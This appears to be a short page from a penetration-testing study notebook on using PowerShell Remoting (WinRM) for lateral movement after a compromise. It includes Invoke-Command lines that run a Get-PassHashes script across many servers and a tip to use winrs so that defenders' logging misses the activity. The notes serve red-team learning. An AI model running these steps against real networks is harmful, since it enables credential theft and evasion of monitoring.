search
LinkedInGitHub

PowerShell Remoting (WinRM)

circle-info

Rinse and repeat once you compromise another machine. Do the exact same enumeration from a different user/machine standpoint after trying to privesc

circle-info

Enabled by default on Server 2012 onwards with a firewall exception and is the recommended way to manage Windows Core servers

You'll have to enable remoting on Desktop Windows machines and Admin privileges are required for that

One-to-One. Interactive. Runs in a stateful and trusted process (wsmprovhost)

Enter-PSSession -ComputerName dcorp-adminsrv
New-PSSession -ComputerName dcorp-adminsrv

Store sessions in variables and connect

$adminsrv = New-PSSession -ComputerName dcorp-adminsrv
$adminsrv
Enter-PSSession -Session $adminsrv

One-to-Many. Known as Fan-out remoting and is non-interactive. This can execute commands and scripts on multiple machines at once. Can be ran as a background job and by default in memory

Invoke-Command
circle-info

Use -Credential parameter to pass username:password

Invoke-Command -Scriptblock {Get-Process} -ComputerName
(Get-Content <list_of_servers>)
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 
-ComputerName (Get-Content <list_of_servers>)

Execute locally loaded functions

Invoke-Command -ScriptBlock ${function:Get-PassHashes}
-ComputerName (Get-Content <list_of_servers>)

With Arguments

Execure "Stateful" commands on target machines

hashtag
OPSEC Friendly Option - Winrs

circle-info

PowerShell remoting supports the system-wide transcripts and deep script block logging. We can use winrs in place of PSRemoting to evade the logging

PreviousBloodHoundNextInvoke-Mimikatz

Last updated